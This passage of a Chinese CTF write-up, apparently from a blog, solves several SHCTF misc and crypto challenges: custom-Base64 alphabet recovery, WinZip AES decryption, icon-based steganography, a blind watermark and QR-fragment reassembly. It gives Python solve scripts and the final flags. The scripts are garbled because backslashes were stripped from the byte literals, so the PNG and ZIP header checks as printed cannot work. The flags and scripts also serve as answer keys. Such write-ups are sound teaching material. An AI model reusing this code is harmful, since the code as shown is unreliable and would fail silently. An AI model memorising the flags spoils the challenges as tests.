7RA8yyYKKYy\/K8nGY+VauAk5oKKKK8QKKKKTKKAKbheSbnH19JYDboH\/KbOJKKRKY778KK8NGw3Yg2c4b0lUZTUJr8re0brVhFec8PqlthSpmXAAPnRd8istg2WoEG38OveV+0O+JUN8UZ4xSBqd4HMTJAaK9el8cJOyCELEAoVvtGv5mlJrDePu9dT27RAyKSYKIKKyKkTKBC+86TlsQm0UKKKKBKKKKKQKrQKKKKKKKKKKKamyKKKKKkbAUoPDGJS1ahZDUQkbyQKyKRIIKQKK7RAIypKKKKKyKKRKiYKKKw1KKKKKKK==<\/code><\/pre>\n\n\n\n
png.png.enc<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u81ea\u5b9a\u4e49base64 \u6839\u636e\u5df2\u77e5\u8fd8\u539f\u6620\u5c04\u8868\u7136\u540ebasn64\u8f6c\u56fe\u7247 png\u56fe\u7247\u662f\u5bc6\u7801\uff0czip\u90a3\u4e2a\u662fflag zip\u90a3\u4e2a\u662fWinZip AES<\/strong>\u52a0\u5bc6<\/p>\n\n\n\n
\u52a0\u5bc6\u539f\u7406\uff1a\u81ea\u5b9a\u4e49 Base64 (Custom Base64)\n\u6807\u51c6 Base64\uff1a\u4f7f\u7528 A-Z, a-z, 0-9, +, \/ \u8fd964\u4e2a\u5b57\u7b26\u4f5c\u4e3a\u6620\u5c04\u8868\uff0c\u5c06\u4e8c\u8fdb\u5236\u6570\u636e\u8f6c\u6362\u4e3a\u6587\u672c\u3002\n\u672c\u9898\u7684\u52a0\u5bc6\uff1a\u6253\u4e71\u4e86\u8fd964\u4e2a\u5b57\u7b26\u7684\u987a\u5e8f\u3002\u4f8b\u5982\uff0c\u6807\u51c6\u8868\u91cc\u7684 A \u53ef\u80fd\u5bf9\u5e94\u5bc6\u6587\u91cc\u7684 x\uff0cB \u5bf9\u5e94 7\u3002\n\u7834\u89e3\u65b9\u6cd5\uff08\u5df2\u77e5\u660e\u6587\u653b\u51fb\uff09\uff1a\n\u9898\u76ee\u63d0\u4f9b\u4e86 Readme.txt\uff08\u660e\u6587\uff09\u548c Readme.txt.enc\uff08\u5bc6\u6587\uff09\u3002\n\u901a\u8fc7\u5bf9\u6bd4\u8fd9\u4e24\u8005\uff0c\u6211\u4eec\u53ef\u4ee5\u63a8\u5bfc\u51fa\u7edd\u5927\u90e8\u5206\u5b57\u7b26\u7684\u6620\u5c04\u5173\u7cfb\uff08\u4f8b\u5982\uff1a\u660e\u6587Base64\u7684 \u2018A\u2019 \u53d8\u6210\u4e86\u5bc6\u6587\u7684 \u2018K\u2019\uff09\u3002\n\u7531\u4e8e Readme.txt \u8f83\u77ed\uff0c\u53ef\u80fd\u65e0\u6cd5\u8986\u76d6\u6240\u670964\u4e2a\u5b57\u7b26\uff0c\u4f1a\u6709\u5c11\u91cf\uff08\u7ea65\u4e2a\uff09\u5b57\u7b26\u7f3a\u5931\u3002<\/code><\/pre>\n\n\n\n
PNG CRC32 \u78b0\u649e<\/p>\n\n\n\n
\u6211\u4eec\u8fd8\u6709 png.png.enc\u3002\u5229\u7528\u5269\u4f59\u7f3a\u5931\u7684\u5b57\u7b26\u8fdb\u884c \u5168\u6392\u5217\uff08\u66b4\u529b\u679a\u4e3e\uff09\u3002\n\u6bcf\u751f\u6210\u4e00\u79cd\u6620\u5c04\u8868\uff0c\u5c31\u5c1d\u8bd5\u8fd8\u539f PNG \u56fe\u7247\u7684\u5934\u90e8\u3002\n\u5224\u5b9a\u6807\u51c6\uff1aPNG \u6587\u4ef6\u5934\u5305\u542b IHDR \u6570\u636e\u5757\uff0c\u5176\u4e2d\u6709\u4e00\u4e2a CRC32 \u6821\u9a8c\u7801\u3002\u53ea\u6709\u5f53\u6620\u5c04\u8868\u5b8c\u5168\u6b63\u786e\u65f6\uff0c\u7b97\u51fa\u6765\u7684 CRC32 \u624d\u4f1a\u548c\u6587\u4ef6\u91cc\u8bb0\u5f55\u7684\u4e00\u81f4\u3002\u4ee5\u6b64\u9501\u5b9a\u552f\u4e00\u7684\u5bc6\u94a5\u8868\u3002<\/code><\/pre>\n\n\n\n
\u8fd8\u539f\u56fe\u7247<\/p>\n\n\n\n
png.py<\/p>\n\n\n\n
from pathlib import Path\nimport base64, itertools, struct, zlib\n\nSBA = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\n\ndef vpng(pd):\n    if not pd.startswith(b\"x89PNGrnx1an\"): return False\n    p = 8\n    while p < len(pd):\n        if p + 8 > len(pd): return False\n        l = struct.unpack(\">I\", pd[p:p+4])[0]; t = pd[p+4:p+8]; p += 8\n        if p + l + 4 > len(pd): return False\n        d = pd[p:p+l]; p += l\n        sc = struct.unpack(\">I\", pd[p:p+4])[0]; p += 4\n        cc = zlib.crc32(t) & 0xFFFFFFFF; cc = zlib.crc32(d, cc) & 0xFFFFFFFF\n        if cc != sc: return False\n        if t == b\"IEND\": return p == len(pd)\n    return False\n\ndef bpbm(pt, et):\n    sb = base64.b64encode(pt).decode(); m = {}\n    for sc, cc in zip(sb, et): m[sc] = cc\n    um = [c for c in SBA if c not in m]; uc = [c for c in SBA if c not in set(m.values())]\n    return m, um, uc\n\ndef dcb(es, rm): \n    return base64.b64decode(es.translate(str.maketrans(rm)))\n\ndef rcbm(pt, ept, epng):\n    pm, ms, ac = bpbm(pt, ept)\n    print(f\"[*] Missing Keys: {ms}\")\n    print(f\"[*] Missing Vals: {ac}\")\n    print(\"[*] Brute-forcing PNG CRC...\")\n\n    for p in itertools.permutations(ac):\n        cm = pm.copy(); cm.update({s:c for s,c in zip(ms, p)})\n        rm = {c:s for s,c in cm.items()}\n        try: dp = dcb(epng, rm)\n        except: continue\n        if vpng(dp): return cm, rm\n    raise RuntimeError(\"Failed to recover map via PNG check\")\n\ndef main():\n    d = Path(\".\")\n\n    if not (d\/\"Readme.txt\").exists():\n        print(\"[-] Error: Readme.txt not found\")\n        return\n\n    r = (d\/\"Readme.txt\").read_bytes()\n    er = (d\/\"Readme.txt.enc\").read_text(encoding='utf-8').strip()\n    ep = (d\/\"png.png.enc\").read_text(encoding='utf-8').strip()\n\n    print(\"Recovering Map...\")\n    m, rm = rcbm(r, er, ep)\n    print(\"[+] Map recovered!\")\n\n    print(\"Decoding PNG...\")\n    dp = dcb(ep, rm)\n\n    output_filename = \"png.png\"\n    with open(output_filename, \"wb\") as f:\n        f.write(dp)\n\n    print(f\"[SUCCESS] Image restored: {output_filename}\")\n    print(\"\u6253\u5f00 png.png \u67e5\u770b\u4e8c\u7ef4\u7801\u4e86\u3002\")\n\nif __name__ == \"__main__\": \n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u624b\u673a\u626b\u63cf<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u538b\u7f29\u5305\u5bc6\u7801<\/p>\n\n\n\n
base64_15_n0t_3ncrypt10n<\/code><\/pre>\n\n\n\n
\u8fd8\u539fzip<\/p>\n\n\n\n
flag.zip<\/code> \u4e0d\u662f\u666e\u901a\u7684 Zip \u52a0\u5bc6\uff0c\u800c\u662f WinZip AES<\/strong> \u6807\u51c6\u3002<\/p>\n\n\n\n
\u7ed3\u6784<\/strong>\uff1aZIP \u6587\u4ef6\u5934\u4e2d\u6709\u4e00\u4e2a Extra Field (ID 0x9901<\/code>)\uff0c\u6807\u8bb0\u4e86\u5b83\u662f AES \u52a0\u5bc6\u3002<\/p>\n\n\n\n
\u89e3\u5bc6\u6d41\u7a0b\uff1a<\/p>\n\n\n\n
\u8bfb\u53d6 Salt\uff08\u76d0\u503c\uff09\u3002\n\u4f7f\u7528 PBKDF2 \u7b97\u6cd5\uff0c\u7ed3\u5408\u5bc6\u7801 base64_15_n0t_3ncrypt10n \u548c Salt\uff0c\u751f\u6210\u89e3\u5bc6\u5bc6\u94a5\uff08AES Key\uff09\u548c\u8ba4\u8bc1\u5bc6\u94a5\uff08HMAC Key\uff09\u3002\n\u9a8c\u8bc1\u5bc6\u7801\u63d0\u793a\u4f4d\uff08Password Verification Value\uff09\u3002\n\u4f7f\u7528 AES\uff08\u901a\u5e38\u662f CTR \u6a21\u5f0f\uff09\u89e3\u5bc6\u5185\u5bb9\u3002\n\u4f7f\u7528 HMAC-SHA1 \u9a8c\u8bc1\u89e3\u5bc6\u540e\u7684\u6570\u636e\u5b8c\u6574\u6027\uff08\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u4f60\u624b\u52a8\u89e3\u538b\u4f1a\u62a5 CRC\/\u6821\u9a8c\u9519\u8bef\uff0c\u56e0\u4e3a\u624b\u52a8\u5de5\u5177\u53ef\u80fd\u6ca1\u5904\u7406\u597d\u8fd9\u6b65\uff09\u3002\n\u6700\u540e\u89e3\u538b\uff08Inflate\/Deflate\uff09\u3002<\/code><\/pre>\n\n\n\n
flag<\/p>\n\n\n\n
\u89e3\u538b\u51fa\u7684 flag.txt.enc \u5185\u5bb9\u662f\u4e00\u4e32\u4e71\u7801\uff0c\u56e0\u4e3a\u5b83\u4e5f\u88ab \u81ea\u5b9a\u4e49 Base64 \u52a0\u5bc6\u4e86\u3002\n\u4f7f\u7528\u7b2c1\u6b65\u6062\u590d\u7684\u6620\u5c04\u8868\uff0c\u5bf9\u5176\u8fdb\u884c\u89e3\u7801\uff0c\u5f97\u5230\u6700\u7ec8 Flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\nimport itertools\nimport struct\nimport zlib\nfrom pathlib import Path\n\ntry:\n    from Crypto.Protocol.KDF import PBKDF2\n    from Crypto.Hash import SHA1, HMAC\n    from Crypto.Cipher import AES\nexcept ImportError:\n    print(\"\u8bf7\u5148\u8fd0\u884c: pip install pycryptodome\")\n    exit()\n\nSBA = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"\n\ndef pzfh(zd, sp=0):\n    if zd[sp:sp+4] != b\"PKx03x04\": raise ValueError(\"\u4e0d\u662f\u6709\u6548\u7684ZIP\u5934\")\n    s, v, f, cm, mt, md, crc, cs, us, fnl, efl = struct.unpack_from(\"<4sHHHHHIIIHH\", zd, sp)\n    cp = sp + 30\n    fn = zd[cp:cp+fnl].decode(errors=\"replace\")\n    cp += fnl\n    ef = zd[cp:cp+efl]\n    return {\"v\": v, \"f\": f, \"cm\": cm, \"crc\": crc, \"cs\": cs, \"us\": us, \"fn\": fn, \"ef\": ef, \"dsp\": cp+efl, \"hsp\": sp}\n\ndef pwaef(efd):\n    p = 0\n    while p + 4 <= len(efd):\n        fid = int.from_bytes(efd[p:p+2], \"little\")\n        fsz = int.from_bytes(efd[p+2:p+4], \"little\")\n        fb = efd[p+4:p+4+fsz]; p += 4 + fsz\n        if fid == 0x9901:\n            if len(fb) != 7: raise ValueError(\"AES\u5b57\u6bb5\u957f\u5ea6\u9519\u8bef\")\n            av = int.from_bytes(fb[0:2], \"little\")\n            vc = fb[2:4]\n            ks = fb[4]\n            acm = int.from_bytes(fb[5:7], \"little\")\n            return av, vc, ks, acm\n    raise ValueError(\"\u672a\u627e\u5230AES\u989d\u5916\u5b57\u6bb5\")\n\ndef dwaes(ed, pw, ks):\n    kl = {1:16,2:24,3:32}[ks]; sl = {1:8,2:12,3:16}[ks]\n    s = ed[:sl]; pv = ed[sl:sl+2]; mac = ed[-10:]; ct = ed[sl+2:-10]\n    dk = PBKDF2(pw, s, dkLen=2*kl+2, count=1000, hmac_hash_module=SHA1)\n    ek = dk[:kl]; ak = dk[kl:2*kl]; pc = dk[2*kl:2*kl+2]\n\n    if pc != pv: raise ValueError(\"\u5bc6\u7801\u9519\u8bef (\u6821\u9a8c\u503c\u4e0d\u5339\u914d)\")\n    if HMAC.new(ak, ct, SHA1).digest()[:10] != mac: raise ValueError(\"HMAC\u6821\u9a8c\u5931\u8d25 (\u6587\u4ef6\u635f\u574f\u6216\u88ab\u7be1\u6539)\")\n\n    c = AES.new(ek, AES.MODE_ECB); r = bytearray(); cnt = 1\n    for i in range(0, len(ct), 16):\n        b = ct[i:i+16]; cb = struct.pack(\"<I\", cnt) + b\"x00\"*12; ks_stream = c.encrypt(cb)\n        r.extend(bytes(x ^ ks_stream[j] for j,x in enumerate(b))); cnt += 1\n    return bytes(r)\n\ndef vpng(pd):\n    if not pd.startswith(b\"x89PNGrnx1an\"): return False\n    p = 8\n    while p < len(pd):\n        if p + 8 > len(pd): return False\n        l = struct.unpack(\">I\", pd[p:p+4])[0]; t = pd[p+4:p+8]; p += 8\n        if p + l + 4 > len(pd): return False\n        d = pd[p:p+l]; p += l\n        sc = struct.unpack(\">I\", pd[p:p+4])[0]; p += 4\n        cc = zlib.crc32(t) & 0xFFFFFFFF; cc = zlib.crc32(d, cc) & 0xFFFFFFFF\n        if cc != sc: return False\n        if t == b\"IEND\": return p == len(pd)\n    return False\n\ndef bpbm(pt, et):\n    sb = base64.b64encode(pt).decode(); m = {}\n    for sc, cc in zip(sb, et): m[sc] = cc\n    um = [c for c in SBA if c not in m]; uc = [c for c in SBA if c not in set(m.values())]\n    return m, um, uc\n\ndef dcb(es, rm): return base64.b64decode(es.translate(str.maketrans(rm)))\n\ndef rcbm(pt, ept, epng):\n    pm, ms, ac = bpbm(pt, ept)\n    for p in itertools.permutations(ac):\n        cm = pm.copy(); cm.update({s:c for s,c in zip(ms, p)})\n        rm = {c:s for s,c in cm.items()}\n        try: dp = dcb(epng, rm)\n        except: continue\n        if vpng(dp): return cm, rm\n    raise RuntimeError(\"\u65e0\u6cd5\u901a\u8fc7PNG\u6821\u9a8c\u627e\u5230\u6620\u5c04\u8868\")\n\ndef main():\n    d = Path(\".\")\n    if not (d\/\"Readme.txt\").exists():\n        print(\"\u7f3a\u5c11 Readme.txt\")\n        return\n\n    r = (d\/\"Readme.txt\").read_bytes()\n    er = (d\/\"Readme.txt.enc\").read_text(encoding='utf-8').strip()\n    ep = (d\/\"png.png.enc\").read_text(encoding='utf-8').strip()\n    ez = (d\/\"flag.zip.enc\").read_text(encoding='utf-8').strip()\n\n    print(\"[*] \u6b63\u5728\u6062\u590d\u6620\u5c04\u8868...\")\n    m, rm = rcbm(r, er, ep)\n    print(\"[+] \u6620\u5c04\u8868\u6062\u590d\u6210\u529f\")\n\n    print(\"[*] \u89e3\u7801 flag.zip.enc ...\")\n    dz = dcb(ez, rm)\n\n    print(\"[*] \u89e3\u6790 ZIP \u7ed3\u6784...\")\n    zh = pzfh(dz, 0)\n\n    av, vc, ks, acm = pwaef(zh[\"ef\"])\n    if vc != b\"AE\": \n        raise ValueError(\"\u4e0d\u662f WinZip AES \u683c\u5f0f\")\n\n    print(f\"[+] \u53d1\u73b0 AES \u52a0\u5bc6 (KeyStrength={ks}, Method={acm})\")\n    print(\"[*] \u6b63\u5728\u89e3\u5bc6 (\u5bc6\u7801: base64_15_n0t_3ncrypt10n) ...\")\n\n    ed = dz[zh[\"dsp\"]:zh[\"dsp\"]+zh[\"cs\"]]\n\n    pw = b\"base64_15_n0t_3ncrypt10n\"\n\n    dd = dwaes(ed, pw, ks)\n\n    if acm == 8: \n        dd = zlib.decompress(dd, -zlib.MAX_WBITS)\n    elif acm != 0: \n        raise NotImplementedError(\"\u4e0d\u652f\u6301\u7684\u538b\u7f29\u683c\u5f0f\")\n\n    flag_cipher = dd.decode('utf-8').strip()\n    print(f\"n[*] \u89e3\u51fa\u7684\u5185\u90e8\u5bc6\u6587: {flag_cipher}\")\n\n    print(\"[*] \u6b63\u5728\u8fdb\u884c\u6700\u7ec8\u89e3\u7801...\")\n    final_flag = dcb(flag_cipher, rm).decode('utf-8')\n\n    print(\"n\" + \"=\"*40)\n    print(f\"FLAG: {final_flag}\")\n    print(\"=\"*40 + \"n\")\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
 SHCTF{fbf655a2-0661-4665-ac56-2331ca65e887}<\/code><\/pre>\n\n\n\n
\u83b7\u53d6 SHSolver \u4e4b\u8def<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e0b\u8f7d\u56fe\u7247<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u5f20\u957f\u56fe shsolver.jpg<\/code>\uff0c\u56fe\u7247\u5185\u5bb9\u7531\u5927\u91cf\u7684 QQ \u7b49\u7ea7\u56fe\u6807\uff08\u7687\u51a0\u3001\u592a\u9633\u3001\u6708\u4eae\u3001\u661f\u661f\uff09\u7ec4\u6210\u3002\u9898\u76ee\u63d0\u793a\u4e0e\u201cQQ\u7b49\u7ea7\u201d\u6709\u5173\u3002<\/p>\n\n\n\n
\u52a0\u5bc6\/\u7f16\u7801\u539f\u7406<\/p>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8e QQ \u7b49\u7ea7\u8ba1\u7b97\u89c4\u5219<\/strong> \u7684 4\u8fdb\u5236\uff08\u6216\u6df7\u5408\u8fdb\u5236\uff09<\/strong> \u7f16\u7801\u9690\u5199\u3002<\/p>\n\n\n\n
\u6570\u503c\u6620\u5c04\uff1a\u6839\u636e QQ \u7b49\u7ea7\u89c4\u5219\uff1a\n1 \u7687\u51a0 (Crown) = 64\n1 \u592a\u9633 (Sun) = 16\n1 \u6708\u4eae (Moon) = 4\n1 \u661f\u661f (Star) = 1<\/code><\/pre>\n\n\n\n
\u6570\u636e\u7ed3\u6784\uff1a<\/p>\n\n\n\n
\u56fe\u7247\u88ab\u5206\u4e3a 933 \u884c\u3002\u6bcf\u4e00\u884c\u4ee3\u8868\u4e00\u4e2a ASCII \u5b57\u7b26\u3002\n\u6bcf\u4e00\u884c\u5185\u7684\u56fe\u6807\u4ee3\u8868\u8be5\u5b57\u7b26\u7684 ASCII \u7801\u6570\u503c\u4e4b\u548c\u3002\n\u4f8b\u5982\uff1a\u4e00\u884c\u4e2d\u6709 `1\u4e2a\u7687\u51a0 + 1\u4e2a\u592a\u9633 + 2\u4e2a\u661f\u661f` = 64+16+2=8264+16+2=82\uff0c\u5bf9\u5e94\u7684\u5b57\u7b26\u662f `R`\u3002<\/code><\/pre>\n\n\n\n
\u6392\u5e8f\u89c4\u5219\uff1a<\/p>\n\n\n\n
\u5728\u6bcf\u4e00\u884c\u4e2d\uff0c\u56fe\u6807\u603b\u662f\u6309\u7167\u4ece\u5927\u5230\u5c0f\u7684\u987a\u5e8f\u6392\u5217\uff08\u7687\u51a0\u5728\u6700\u5de6\uff0c\u661f\u661f\u5728\u6700\u53f3\uff09\u3002\u5229\u7528\u8fd9\u4e2a\u89c4\u5219\uff0c\u5373\u4f7f\u6211\u4eec\u4e0d\u901a\u8fc7\u56fe\u50cf\u8bc6\u522b\u8ba4\u51fa\u54ea\u4e2a\u662f\u7687\u51a0\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u6392\u5217\u7ec4\u5408\u66b4\u529b\u5c1d\u8bd5\uff0c\u627e\u51fa\u552f\u4e00\u7b26\u5408\u201c\u5355\u8c03\u9012\u51cf\u201d\u89c4\u5f8b\u7684\u6620\u5c04\u5173\u7cfb\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u6d41\u7a0b<\/p>\n\n\n\n
\u56fe\u50cf\u5904\u7406\uff1a\u5c06\u56fe\u7247\u4e8c\u503c\u5316\uff0c\u5e76\u68c0\u6d4b\u51fa\u7f51\u683c\u7684\u884c\u548c\u5217\uff0c\u5c06\u5176\u5207\u5272\u6210\u5c0f\u5355\u5143\u683c\u3002\n\u805a\u7c7b\u5206\u6790\uff1a\u5bf9\u6240\u6709\u975e\u7a7a\u5355\u5143\u683c\u8fdb\u884c\u56fe\u50cf\u76f8\u4f3c\u5ea6\u5bf9\u6bd4\uff08\u6c49\u660e\u8ddd\u79bb\uff09\uff0c\u81ea\u52a8\u5c06\u56fe\u6807\u5206\u4e3a 4 \u7c7b\uff08A, B, C, D\uff09\uff0c\u65e0\u9700\u4eba\u5de5\u6807\u6ce8\u3002\n\u903b\u8f91\u63a8\u5bfc\uff1a\u5bf9 4 \u7c7b\u56fe\u6807\u4e0e\u6743\u91cd [64, 16, 4, 1] \u8fdb\u884c\u5168\u6392\u5217\u6620\u5c04\uff08\u5171 24 \u79cd\u60c5\u51b5\uff09\u3002\u68c0\u67e5\u54ea\u4e00\u79cd\u6620\u5c04\u80fd\u4f7f\u5f97\u6240\u6709\u884c\u7684\u56fe\u6807\u6743\u91cd\u90fd\u6ee1\u8db3 \u5de6 >= \u53f3 \u7684\u89c4\u5219\u3002\n\u89e3\u7801\uff1a\u5229\u7528\u6b63\u786e\u7684\u6620\u5c04\u8ba1\u7b97\u6bcf\u4e00\u884c\u7684\u6570\u503c\uff0c\u8f6c\u4e3a ASCII \u5b57\u7b26\u4e32\u3002\n\u63d0\u53d6 flag\uff1a\u89e3\u7801\u540e\u7684\u6587\u672c\u4e2d\u5305\u542b\u4e00\u6bb5 Base64 \u7f16\u7801\uff0c\u89e3\u5bc6\u8be5 Base64 \u540e\uff0c\u53d1\u73b0\u5f97\u5230\u7684\u5b57\u7b26\u4e32\u662f\u5012\u5e8f\u7684\uff0c\u5c06\u5176\u53cd\u8f6c\u5373\u53ef\u5f97\u5230\u6700\u7ec8 flag SHCTF{...}\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import base64\nimport itertools\nimport numpy as np\nfrom PIL import Image\nfrom pathlib import Path\n\ndef get_regions(mask):\n    regions, start = [], None\n    for i, v in enumerate(mask):\n        if v and start is None: start = i\n        elif not v and start is not None:\n            regions.append((start, i - 1))\n            start = None\n    if start: regions.append((start, len(mask) - 1))\n    return regions\n\ndef main():\n    path = Path('shsolver.jpg')\n    if not path.exists(): return\n\n    print(f\"[+] \u6b63\u5728\u8bfb\u53d6\u672c\u5730\u56fe\u7247: {path.name}\")\n    img = np.array(Image.open(path).convert('L')) > 50\n\n    rows = get_regions(img.sum(axis=1) > 0)\n    cols = get_regions(img.sum(axis=0) > 0)\n    print(f\"[+] \u68c0\u6d4b\u5230\u7f51\u683c: {len(rows)} \u884c x {len(cols)} \u5217\")\n\n    print(\"[+] \u5f00\u59cb\u805a\u7c7b\u5206\u6790...\")\n    templates, grid = [], []\n\n    for rs, re in rows:\n        row_icons = []\n        for cs, ce in cols:\n            cell = img[rs:re+1, cs:ce+1]\n            if cell.sum() < 10: continue\n\n            icon = Image.fromarray((cell * 255).astype(np.uint8)).resize((16, 16))\n            pat = (np.array(icon) > 0).flatten()\n\n            match_idx, min_dist = -1, float('inf')\n            for i, t in enumerate(templates):\n                dist = np.count_nonzero(pat != t)\n                if dist < min_dist: min_dist, match_idx = dist, i\n\n            if min_dist <= 30:\n                row_icons.append(match_idx)\n            else:\n                row_icons.append(len(templates))\n                templates.append(pat)\n        grid.append(row_icons)\n\n    print(f\"[+] \u8bc6\u522b\u5230 {len(templates)} \u79cd\u4e0d\u540c\u56fe\u6807\")\n    print(\"[+] \u6b63\u5728\u63a8\u5bfc\u56fe\u6807\u7b49\u7ea7\u987a\u5e8f...\")\n\n    weights = [64, 16, 4, 1]\n    mapping = None\n\n    for p in itertools.permutations(range(4)):\n        current_map = dict(zip(p, weights))\n        valid = True\n        for row in grid:\n            vals = [current_map[x] for x in row]\n            if vals != sorted(vals, reverse=True):\n                valid = False\n                break\n        if valid:\n            mapping = current_map\n            print(f\"[+] \u627e\u5230\u5408\u6cd5\u987a\u5e8f: {p}\")\n            break\n\n    if not mapping: return\n\n    print(\"[+] \u6b63\u5728\u89e3\u7801\u5185\u5bb9...\")\n    decoded = \"\".join(chr(sum(mapping[x] for x in row)) for row in grid)\n\n    print(f\"n{'='*40}n\u539f\u59cb\u89e3\u7801\u6587\u672c:n{decoded}n{'='*40}n\")\n\n    lines = decoded.splitlines()\n    for i, line in enumerate(lines):\n        if \"gift\" in line and i + 1 < len(lines):\n            print(\"[+] \u53d1\u73b0\u63d0\u793a\u8bcd 'gift'\uff0c\u63d0\u53d6\u4e0b\u4e00\u884c\u4f5c\u4e3a\u5bc6\u6587\u3002\")\n            try:\n                b64 = lines[i+1].replace(\" \", \"\").strip()\n                flag = base64.b64decode(b64).decode()[::-1]\n                print(f\"nSUCCESS! Flag: {flag}\")\n            except:\n                pass\n            break\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{M4K3_y0Ur_COMpu7eR_@_helP1U1_p4l}<\/code><\/pre>\n\n\n\n
\u9636\u6bb53<\/h2>\n\n\n\n
\u73cd\u8d35\u7684Signature<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4e00\u4e2a\u6587\u6863 \u6539\u540e\u7f00.zip\u53d1\u73b0\u662f\u4f2a\u52a0\u5bc6<\/p>\n\n\n\n
\u5728word_rels \u6709\u4e00\u4e2adoc \u91cc\u9762\u662f\u4e00\u4e2abmp\u56fe\u7247base64\u8f6c\u56fe\u7247\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7136\u540e\u662f\u5355\u56fe\u76f2\u6c34\u5370<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
U0hDVEZ7N2hhbmtfeTB1X2Ywcl9sMWsxbmdfTHNjY2N9<\/code><\/pre>\n\n\n\n
base64\u89e3\u7801<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{7hank_y0u_f0r_l1k1ng_Lsccc}<\/code><\/pre>\n\n\n\n
Structured Chaos<\/strong><\/h3>\n\n\n\n
\u8fd9\u4e2a\u9898\u76ee\u5957\u5a03\u5957\u7684\u4e0d\u50cf\u8bd7\u4eba\u51fa\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
15\u5f20\u4e8c\u7ef4\u7801\uff0c\u6ca1\u6709\u7528\u811a\u672c \u6240\u4ee5\u624b\u52a8\u5206\u79bb<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u811a\u672c\u7b80\u5355\u8bc6\u522b<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import cv2\nimport zxingcpp\nimport os\nimport binascii\n\ndef analyze_and_reorder():\n    print(\"[-] \u5f00\u59cb\u5206\u6790 15 \u4e2a\u788e\u7247\u7684\u7279\u5f81...\")\n\n    fragments = {}\n\n    for i in range(1, 16):\n        filename = f\"{i}.png\"\n        if not os.path.exists(filename): continue\n\n        img = cv2.imread(filename)\n        padded_img = cv2.copyMakeBorder(img, 50, 50, 50, 50, cv2.BORDER_CONSTANT, value=[255, 255, 255])\n        gray = cv2.cvtColor(padded_img, cv2.COLOR_BGR2GRAY)\n\n        results = zxingcpp.read_barcodes(gray)\n        if not results:\n            results = zxingcpp.read_barcodes(cv2.bitwise_not(gray))\n\n        if results:\n            try: data = results[0].bytes\n            except: \n                try: data = results[0].raw_bytes\n                except: data = results[0].text.encode('latin-1')\n\n            fragments[i] = data\n\n            head = data[:4].hex().upper()\n            tail = data[-4:].hex().upper()\n            print(f\"[\u788e\u7247 {i:02d}] \u957f\u5ea6: {len(data)} | \u5934: {head} | \u5c3e: {tail}\")\n        else:\n            print(f\"[\u788e\u7247 {i:02d}] \u89e3\u7801\u5931\u8d25\")\n\n    print(\"-\" * 40)\n\n    png_header_hex = \"89504E47\"\n    png_footer_hex = \"AE426082\"\n\n    start_index = -1\n    end_index = -1\n\n    for i, data in fragments.items():\n        hex_data = data.hex().upper()\n\n        if hex_data.startswith(png_header_hex):\n            print(f\"[!] \u53d1\u73b0 PNG \u6587\u4ef6\u5934\u5728: \u788e\u7247 {i}\")\n            start_index = i\n        if hex_data.endswith(png_footer_hex):\n            print(f\"[!] \u53d1\u73b0 PNG \u6587\u4ef6\u5c3e\u5728: \u788e\u7247 {i}\")\n            end_index = i\n\n    rev_header_hex = \"474E5089\"\n    for i, data in fragments.items():\n        if data.hex().upper().startswith(rev_header_hex):\n             print(f\"[!] \u53d1\u73b0 \u9006\u5e8f(Reverse) PNG\u5934\u5728: \u788e\u7247 {i}\")\n\n    if start_index == -1 and end_index == -1:\n        print(\"[?] \u672a\u627e\u5230\u660e\u663e\u7684 PNG \u5934\/\u5c3e\u3002\u5c1d\u8bd5\u66b4\u529b\u68c0\u6d4b\u6240\u6709\u53ef\u80fd\u7684\u6392\u5217...\")\n        pass\n    else:\n        print(f\"[-] \u63a8\u6d4b\u987a\u5e8f: \u4ece {start_index} \u5f00\u59cb\uff0c\u5230 {end_index} \u7ed3\u675f\u3002\")\n\nif __name__ == \"__main__\":\n    analyze_and_reorder()<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u53d1\u73b0\u8fd9\u4e2a15\u4e2a\u89e3\u7801\u7136\u540e\u6309\u7167\u987a\u5e8f\u62fc\u63a5\u5c31\u662fpng\u56fe\u7247<\/p>\n\n\n\n
